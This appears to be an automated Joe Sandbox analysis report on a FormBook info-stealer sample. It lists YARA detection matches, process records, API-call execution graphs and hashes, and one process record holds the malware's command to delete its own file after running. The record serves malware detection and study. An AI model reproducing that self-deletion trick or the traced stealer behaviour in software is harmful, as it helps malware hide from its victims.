                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:high

                                      General

                                      Target ID:14
                                      Start time:20:51:26
                                      Start date:30/03/2023
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del "C:\Users\user\Desktop\ClbrTLBbVA.exe"
                                      Imagebase:0xb0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      General

                                      Target ID:15
                                      Start time:20:51:27
                                      Start date:30/03/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:13.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:41
                                        Total number of Limit Nodes:3
                                        execution_graph 8491 c2e160 SetWindowLongW 8492 c2e1cc 8491->8492 8524 c26a50 GetCurrentProcess 8525 c26ac3 8524->8525 8526 c26aca GetCurrentThread 8524->8526 8525->8526 8527 c26b00 8526->8527 8528 c26b07 GetCurrentProcess 8526->8528 8527->8528 8529 c26b3d 8528->8529 8533 c27009 8529->8533 8530 c26b65 GetCurrentThreadId 8531 c26b96 8530->8531 8534 c2707a DuplicateHandle 8533->8534 8536 c27012 8533->8536 8535 c27116 8534->8535 8535->8530 8536->8530 8493 c27628 8494 c27650 8493->8494 8495 c27678 8494->8495 8497 c26ca4 8494->8497 8498 c26caf 8497->8498 8501 c2b6c8 8498->8501 8499 c27720 8499->8495 8503 c2b6f9 8501->8503 8504 c2b746 8501->8504 8502 c2b705 8502->8499 8503->8502 8506 c2ba10 8503->8506 8504->8499 8509 c2ba50 8506->8509 8507 c2ba1a 8507->8504 8510 c2ba73 8509->8510 8511 c2ba8b 8510->8511 8516 c2bce8 8510->8516 8511->8507 8512 c2ba83 8512->8511 8513 c2bc88 GetModuleHandleW 8512->8513 8514 c2bcb5 8513->8514 8514->8507 8517 c2bcfc 8516->8517 8518 c2bd21 8517->8518 8520 c2a998 8517->8520 8518->8512 8521 c2bec8 LoadLibraryExW 8520->8521 8523 c2bf41 8521->8523 8523->8518 8537 c2df18 8538 c2df80 CreateWindowExW 8537->8538 8540 c2e03c 8538->8540

                                        Executed Functions

                                        Function 00C26A40 Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00C26AB0
                                        • GetCurrentThread.KERNEL32 ref: 00C26AED
                                        • GetCurrentProcess.KERNEL32 ref: 00C26B2A
                                        • GetCurrentThreadId.KERNEL32 ref: 00C26B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 32bef35cae95e038ff4121bf50c2cbc9a751840a25948885e4f8df58a3703f1b
                                        • Instruction ID: 7330817b680bbb5ed590e82de86849d66be32bcbe11aa6df21aa822b9f992253
                                        • Opcode Fuzzy Hash: 32bef35cae95e038ff4121bf50c2cbc9a751840a25948885e4f8df58a3703f1b
                                        • Instruction Fuzzy Hash: BF5164B49002498FDB10CFAADA88BDEBFF1BF48314F248459E019B7290C7B56884CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C26A50 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 00C26AB0
                                        • GetCurrentThread.KERNEL32 ref: 00C26AED
                                        • GetCurrentProcess.KERNEL32 ref: 00C26B2A
                                        • GetCurrentThreadId.KERNEL32 ref: 00C26B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: f70a8c01014efee2c03eecb33272a5eae940ef4ad14c0c257ee5c66329220cac
                                        • Instruction ID: a8ee9ee5dc25a6d1319dc9c822a07be44dbeceb01d641e9112cc2060d6ae39a6
                                        • Opcode Fuzzy Hash: f70a8c01014efee2c03eecb33272a5eae940ef4ad14c0c257ee5c66329220cac
                                        • Instruction Fuzzy Hash: E55144B49002498FDB14CFAADA48BDEBBF1BF48314F208459E019B7790D7756984CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C2BA50 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 38 c2ba50-c2ba75 call c2a944 41 c2ba77-c2ba85 call c2bce8 38->41 42 c2ba8b-c2ba8f 38->42 41->42 47 c2bbc0-c2bc80 41->47 43 c2baa3-c2bae4 42->43 44 c2ba91-c2ba9b 42->44 49 c2baf1-c2baff 43->49 50 c2bae6-c2baee 43->50 44->43 87 c2bc82-c2bc85 47->87 88 c2bc88-c2bcb3 GetModuleHandleW 47->88 52 c2bb23-c2bb25 49->52 53 c2bb01-c2bb06 49->53 50->49 56 c2bb28-c2bb2f 52->56 54 c2bb11 53->54 55 c2bb08-c2bb0f call c2a950 53->55 59 c2bb13-c2bb21 54->59 55->59 60 c2bb31-c2bb39 56->60 61 c2bb3c-c2bb43 56->61 59->56 60->61 62 c2bb50-c2bb59 call c2a960 61->62 63 c2bb45-c2bb4d 61->63 68 c2bb66-c2bb6b 62->68 69 c2bb5b-c2bb63 62->69 63->62 71 c2bb89-c2bb8d 68->71 72 c2bb6d-c2bb74 68->72 69->68 76 c2bb93-c2bb96 71->76 72->71 73 c2bb76-c2bb86 call c2a6e8 call c2a970 72->73 73->71 79 c2bb98-c2bbb6 76->79 80 c2bbb9-c2bbbf 76->80 79->80 87->88 89 c2bcb5-c2bcbb 88->89 90 c2bcbc-c2bcd0 88->90 89->90
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00C2BCA6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: e68a69c9313912e8ae6421f7b22c5471ac31562e04f56bc5ed459a1338e8bfde
                                        • Instruction ID: e0c95ede2011e107bbd9c40831ae6b4fda0f4cb8f3b1f0df2b7206d4e3b53fde
                                        • Opcode Fuzzy Hash: e68a69c9313912e8ae6421f7b22c5471ac31562e04f56bc5ed459a1338e8bfde
                                        • Instruction Fuzzy Hash: 3B817570A00B158FD724DF2AE45175ABBF1FF88300F10892DE49AD7A50D775E94ACB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C2DF18 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 93 c2df18-c2df7e 94 c2df80-c2df86 93->94 95 c2df89-c2df90 93->95 94->95 96 c2df92-c2df98 95->96 97 c2df9b-c2e03a CreateWindowExW 95->97 96->97 99 c2e043-c2e07b 97->99 100 c2e03c-c2e042 97->100 104 c2e088 99->104 105 c2e07d-c2e080 99->105 100->99 106 c2e089 104->106 105->104 106->106
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C2E02A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 1f668d398cf5c17a206d690b0cab2456ba4d8410e6273727bc0f16dcacdbb7d2
                                        • Instruction ID: e28875fd9c29c16feab280bc889d3109ec9cfe8cedc1e5b7145a12889f894ad4
                                        • Opcode Fuzzy Hash: 1f668d398cf5c17a206d690b0cab2456ba4d8410e6273727bc0f16dcacdbb7d2
                                        • Instruction Fuzzy Hash: AC41F3B1D00319DFDB14CF9AD984ADEFBB5BF48310F24812AE815AB210D7759945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C27009 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 107 c27009-c27010 108 c27012-c27041 call c26c44 107->108 109 c2707a-c27114 DuplicateHandle 107->109 113 c27046-c2706c 108->113 111 c27116-c2711c 109->111 112 c2711d-c2713a 109->112 111->112
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C27107
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: d3e3f640a7088db7ef86acd3ac1889f372349de6f67b958cd2f564b9793a74f2
                                        • Instruction ID: df784cac658904e078b30f92374c936d8a069d319c135af32816dde59c7a26f7
                                        • Opcode Fuzzy Hash: d3e3f640a7088db7ef86acd3ac1889f372349de6f67b958cd2f564b9793a74f2
                                        • Instruction Fuzzy Hash: 48417776900258AFCB11CFA9D880ADEBFF6FF49320F14805AE944E7221C3759955DFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C27078 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 118 c27078-c27114 DuplicateHandle 119 c27116-c2711c 118->119 120 c2711d-c2713a 118->120 119->120
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C27107
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 3dbab5a5ef75780c019f67d01a50a5050fca52de4cce229c67f00376e13b8814
                                        • Instruction ID: a67ec8d246cb249d914462d01c1762f42b52c2d53ed9ff8a690a03c273514029
                                        • Opcode Fuzzy Hash: 3dbab5a5ef75780c019f67d01a50a5050fca52de4cce229c67f00376e13b8814
                                        • Instruction Fuzzy Hash: 452105B59002089FDB10CFAAD984AEEBFF5FF48324F14851AE854A7311C379A955CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C27080 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 123 c27080-c27114 DuplicateHandle 124 c27116-c2711c 123->124 125 c2711d-c2713a 123->125 124->125
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C27107
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: b0f4a7c726c94bc81e3241ff4d537a7052f4ebd352e4d1f335a2cb20daa761f1
                                        • Instruction ID: 6da27719b9428d86a14fbf140ba36c83aed30045b950eee3ec44b6bfa4882ea1
                                        • Opcode Fuzzy Hash: b0f4a7c726c94bc81e3241ff4d537a7052f4ebd352e4d1f335a2cb20daa761f1
                                        • Instruction Fuzzy Hash: 4A21E4B59002199FDB10CFAAD984ADEBBF9EB48324F14841AE814A7350D379A954CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C2A998 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 128 c2a998-c2bf08 130 c2bf10-c2bf3f LoadLibraryExW 128->130 131 c2bf0a-c2bf0d 128->131 132 c2bf41-c2bf47 130->132 133 c2bf48-c2bf65 130->133 131->130 132->133
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C2BD21,00000800,00000000,00000000), ref: 00C2BF32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 2037d5e5b99b0f84f2384c3c6038c96c1d51af2cda6baaa038105b14cbdb56b6
                                        • Instruction ID: c8d872e201607173f8db1334f4fad12c527daea321e71433bbfbe61a0e2b7a2e
                                        • Opcode Fuzzy Hash: 2037d5e5b99b0f84f2384c3c6038c96c1d51af2cda6baaa038105b14cbdb56b6
                                        • Instruction Fuzzy Hash: AF1126BA9003498FCB10CF9AD944ADEFBF5EB48314F14842EE425B7640C3B9A945CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C2BC40 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 136 c2bc40-c2bc80 137 c2bc82-c2bc85 136->137 138 c2bc88-c2bcb3 GetModuleHandleW 136->138 137->138 139 c2bcb5-c2bcbb 138->139 140 c2bcbc-c2bcd0 138->140 139->140
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00C2BCA6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 167422c101249583681c43ded9e0204d139258996de025e145a552c5441547e3
                                        • Instruction ID: 8af469997879565fbf8a93775b1587f73d203e7ab2d55cf7c6fb596e3219157e
                                        • Opcode Fuzzy Hash: 167422c101249583681c43ded9e0204d139258996de025e145a552c5441547e3
                                        • Instruction Fuzzy Hash: C51113B6D002098FCB10CF9AD844ADEFBF4AB88324F10841AD429B7600C779A946CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C2E159 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 142 c2e159-c2e1ca SetWindowLongW 143 c2e1d3-c2e1e7 142->143 144 c2e1cc-c2e1d2 142->144 144->143
                                        APIs
                                        • SetWindowLongW.USER32(?,?,?), ref: 00C2E1BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: LongWindow
                                        • String ID:
                                        • API String ID: 1378638983-0
                                        • Opcode ID: fffad3cc30d7fbe6219f4bfae866bba361f56d6681823df8ce049613bea15f94
                                        • Instruction ID: b8dbb71e79f88b1b4e30b2eae55ec269254998d5fa31871cf913536d44bf5553
                                        • Opcode Fuzzy Hash: fffad3cc30d7fbe6219f4bfae866bba361f56d6681823df8ce049613bea15f94
                                        • Instruction Fuzzy Hash: 401136B59002088FDB20CF9AD884BDEBBF4EB48324F248419D854B7700C375A945CFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C2E160 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 146 c2e160-c2e1ca SetWindowLongW 147 c2e1d3-c2e1e7 146->147 148 c2e1cc-c2e1d2 146->148 148->147
                                        APIs
                                        • SetWindowLongW.USER32(?,?,?), ref: 00C2E1BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: LongWindow
                                        • String ID:
                                        • API String ID: 1378638983-0
                                        • Opcode ID: fe1a917784b2eb76aecad0fbe0da2c19c26f21d95314527b520e26c2ab43ad91
                                        • Instruction ID: aeda5c6229ddf8dd76b0ade2615cf239cbe535d7bf424487363f0075ffe47bfc
                                        • Opcode Fuzzy Hash: fe1a917784b2eb76aecad0fbe0da2c19c26f21d95314527b520e26c2ab43ad91
                                        • Instruction Fuzzy Hash: 3911E5B59002099FDB10DF9AD984BDEFBF8EB48324F20841AE855B7741C375A945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 00C2C148 Relevance: .5, Instructions: 522COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d210b87a736a53cfcf32f791cab6ae1e70d54d9d4a48393399bd79d431547208
                                        • Instruction ID: 8d19fb5b5a3b7d94b0a14a757be29576b523cc6bdbd643c8557bccd42bcadd98
                                        • Opcode Fuzzy Hash: d210b87a736a53cfcf32f791cab6ae1e70d54d9d4a48393399bd79d431547208
                                        • Instruction Fuzzy Hash: DE5226B9501F06CBD710CF58ECC87AD7BB1FB42328B908718D5615BAA2D3B4658ADF84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C2A758 Relevance: .3, Instructions: 265COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f2e9a3fc15fffaa3bfa5d86a6b23ad48ad41046017fee7add6059560ea7aad42
                                        • Instruction ID: de290b5159d30122f1843537c9540ac92563888b8385e8eaeccdc75b9c2b4a5d
                                        • Opcode Fuzzy Hash: f2e9a3fc15fffaa3bfa5d86a6b23ad48ad41046017fee7add6059560ea7aad42
                                        • Instruction Fuzzy Hash: F5A18F36E0021ACFCF05DFA5D84459EBBB2FF85300B15856AE915AB221EB75AE05DB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:4.7%
                                        Dynamic/Decrypted Code Coverage:2.9%
                                        Signature Coverage:5.9%
                                        Total number of Nodes:561
                                        Total number of Limit Nodes:74
                                        execution_graph 29676 41f1b0 29679 41b970 29676->29679 29680 41b996 29679->29680 29687 409d40 29680->29687 29682 41b9a2 29683 41b9c3 29682->29683 29695 40c1c0 29682->29695 29685 41b9b5 29731 41a6b0 29685->29731 29734 409c90 29687->29734 29689 409d4d 29690 409d54 29689->29690 29746 409c30 29689->29746 29690->29682 29696 40c1e5 29695->29696 30166 40b1c0 29696->30166 29698 40c23c 30170 40ae40 29698->30170 29700 40c4b3 29700->29685 29701 40c262 29701->29700 30179 4143a0 29701->30179 29703 40c2a7 29703->29700 30182 408a60 29703->30182 29705 40c2eb 29705->29700 30189 41a500 29705->30189 29709 40c341 29710 40c348 29709->29710 30201 41a010 29709->30201 29711 41bdc0 2 API calls 29710->29711 29713 40c355 29711->29713 29713->29685 29715 40c392 29716 41bdc0 2 API calls 29715->29716 29717 40c399 29716->29717 29717->29685 29718 40c3a2 29719 40f4a0 3 API calls 29718->29719 29720 40c416 29719->29720 29720->29710 29721 40c421 29720->29721 29722 41bdc0 2 API calls 29721->29722 29723 40c445 29722->29723 30206 41a060 29723->30206 29726 41a010 2 API calls 29727 40c480 29726->29727 29727->29700 30211 419e20 29727->30211 29730 41a6b0 2 API calls 29730->29700 29732 41a6cf ExitProcess 29731->29732 29733 41af60 LdrLoadDll 29731->29733 29733->29732 29765 418bc0 29734->29765 29738 409cb6 29738->29689 29739 409cac 29739->29738 29772 41b2b0 29739->29772 29741 409cf3 29741->29738 29783 409ab0 29741->29783 29743 409d13 29789 409620 LdrLoadDll 29743->29789 29745 409d25 29745->29689 30140 41b5a0 29746->30140 29749 41b5a0 LdrLoadDll 29750 409c5b 29749->29750 29751 41b5a0 LdrLoadDll 29750->29751 29752 409c71 29751->29752 29753 40f180 29752->29753 29754 40f199 29753->29754 30148 40b040 29754->30148 29756 40f1ac 30152 41a1e0 29756->30152 29759 409d65 29759->29682 29761 40f1d2 29762 40f1fd 29761->29762 30158 41a260 29761->30158 29764 41a490 2 API calls 29762->29764 29764->29759 29766 418bcf 29765->29766 29790 414e50 29766->29790 29768 409ca3 29769 418a70 29768->29769 29796 41a600 29769->29796 29773 41b2c9 29772->29773 29803 414a50 29773->29803 29775 41b2e1 29776 41b2ea 29775->29776 29842 41b0f0 29775->29842 29776->29741 29778 41b2fe 29778->29776 29860 419f00 29778->29860 29786 409aca 29783->29786 30118 407ea0 29783->30118 29785 409ad1 29785->29743 29786->29785 30131 408160 29786->30131 29789->29745 29791 414e6a 29790->29791 29792 414e5e 29790->29792 29791->29768 29792->29791 29795 4152d0 LdrLoadDll 29792->29795 29794 414fbc 29794->29768 29795->29794 29798 418a85 29796->29798 29799 41af60 29796->29799 29798->29739 29800 41af70 29799->29800 29802 41af92 29799->29802 29801 414e50 LdrLoadDll 29800->29801 29801->29802 29802->29798 29804 414d85 29803->29804 29805 414a64 29803->29805 29804->29775 29805->29804 29868 419c50 29805->29868 29808 414b90 29871 41a360 29808->29871 29809 414b73 29928 41a460 LdrLoadDll 29809->29928 29812 414b7d 29812->29775 29813 414bb7 29814 41bdc0 2 API calls 29813->29814 29815 414bc3 29814->29815 29815->29812 29816 414d49 29815->29816 29817 414d5f 29815->29817 29822 414c52 29815->29822 29818 41a490 2 API calls 29816->29818 29937 414790 LdrLoadDll NtReadFile NtClose 29817->29937 29819 414d50 29818->29819 29819->29775 29821 414d72 29821->29775 29823 414cb9 29822->29823 29825 414c61 29822->29825 29823->29816 29824 414ccc 29823->29824 29930 41a2e0 29824->29930 29827 414c66 29825->29827 29828 414c7a 29825->29828 29929 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 29827->29929 29829 414c97 29828->29829 29830 414c7f 29828->29830 29829->29819 29886 414410 29829->29886 29874 4146f0 29830->29874 29833 414c70 29833->29775 29836 414c8d 29836->29775 29838 414d2c 29934 41a490 29838->29934 29840 414caf 29840->29775 29841 414d38 29841->29775 29843 41b101 29842->29843 29844 41b113 29843->29844 29955 41bd40 29843->29955 29844->29778 29846 41b134 29958 414070 29846->29958 29848 41b180 29848->29778 29849 41b157 29849->29848 29850 414070 3 API calls 29849->29850 29851 41b179 29850->29851 29851->29848 29990 415390 29851->29990 29853 41b20a 29855 41b21a 29853->29855 30084 41af00 LdrLoadDll 29853->30084 30000 41ad70 29855->30000 29857 41b248 30079 419ec0 29857->30079 29861 419f1c 29860->29861 29862 41af60 LdrLoadDll 29860->29862 30112 16e967a 29861->30112 29862->29861 29863 419f37 29865 41bdc0 29863->29865 30115 41a670 29865->30115 29867 41b359 29867->29741 29869 414b44 29868->29869 29870 41af60 LdrLoadDll 29868->29870 29869->29808 29869->29809 29869->29812 29870->29869 29872 41a37c NtCreateFile 29871->29872 29873 41af60 LdrLoadDll 29871->29873 29872->29813 29873->29872 29875 41470c 29874->29875 29876 41a2e0 LdrLoadDll 29875->29876 29877 41472d 29876->29877 29878 414734 29877->29878 29879 414748 29877->29879 29880 41a490 2 API calls 29878->29880 29881 41a490 2 API calls 29879->29881 29882 41473d 29880->29882 29883 414751 29881->29883 29882->29836 29938 41bfd0 LdrLoadDll RtlAllocateHeap 29883->29938 29885 41475c 29885->29836 29887 41445b 29886->29887 29888 41448e 29886->29888 29890 41a2e0 LdrLoadDll 29887->29890 29889 4145d9 29888->29889 29894 4144aa 29888->29894 29891 41a2e0 LdrLoadDll 29889->29891 29892 414476 29890->29892 29897 4145f4 29891->29897 29893 41a490 2 API calls 29892->29893 29895 41447f 29893->29895 29896 41a2e0 LdrLoadDll 29894->29896 29895->29840 29898 4144c5 29896->29898 29951 41a320 LdrLoadDll 29897->29951 29900 4144e1 29898->29900 29901 4144cc 29898->29901 29904 4144e6 29900->29904 29905 4144fc 29900->29905 29903 41a490 2 API calls 29901->29903 29902 41462e 29906 41a490 2 API calls 29902->29906 29907 4144d5 29903->29907 29908 41a490 2 API calls 29904->29908 29913 414501 29905->29913 29939 41bf90 29905->29939 29909 414639 29906->29909 29907->29840 29910 4144ef 29908->29910 29909->29840 29910->29840 29921 414513 29913->29921 29942 41a410 29913->29942 29914 414567 29915 41457e 29914->29915 29950 41a2a0 LdrLoadDll 29914->29950 29916 414585 29915->29916 29917 41459a 29915->29917 29919 41a490 2 API calls 29916->29919 29920 41a490 2 API calls 29917->29920 29919->29921 29922 4145a3 29920->29922 29921->29840 29923 4145cf 29922->29923 29945 41bb90 29922->29945 29923->29840 29925 4145ba 29926 41bdc0 2 API calls 29925->29926 29927 4145c3 29926->29927 29927->29840 29928->29812 29929->29833 29931 414d14 29930->29931 29932 41af60 LdrLoadDll 29930->29932 29933 41a320 LdrLoadDll 29931->29933 29932->29931 29933->29838 29935 41a4ac NtClose 29934->29935 29936 41af60 LdrLoadDll 29934->29936 29935->29841 29936->29935 29937->29821 29938->29885 29941 41bfa8 29939->29941 29952 41a630 29939->29952 29941->29913 29943 41a42c NtReadFile 29942->29943 29944 41af60 LdrLoadDll 29942->29944 29943->29914 29944->29943 29946 41bbb4 29945->29946 29947 41bb9d 29945->29947 29946->29925 29947->29946 29948 41bf90 2 API calls 29947->29948 29949 41bbcb 29948->29949 29949->29925 29950->29915 29951->29902 29953 41a64c RtlAllocateHeap 29952->29953 29954 41af60 LdrLoadDll 29952->29954 29953->29941 29954->29953 30085 41a540 29955->30085 29957 41bd6d 29957->29846 29959 414081 29958->29959 29960 414089 29958->29960 29959->29849 29989 41435c 29960->29989 30088 41cf30 29960->30088 29962 4140dd 29963 41cf30 2 API calls 29962->29963 29967 4140e8 29963->29967 29964 414136 29966 41cf30 2 API calls 29964->29966 29970 41414a 29966->29970 29967->29964 29968 41d060 3 API calls 29967->29968 30099 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 29967->30099 29968->29967 29969 4141a7 29971 41cf30 2 API calls 29969->29971 29970->29969 30093 41d060 29970->30093 29972 4141bd 29971->29972 29974 4141fa 29972->29974 29976 41d060 3 API calls 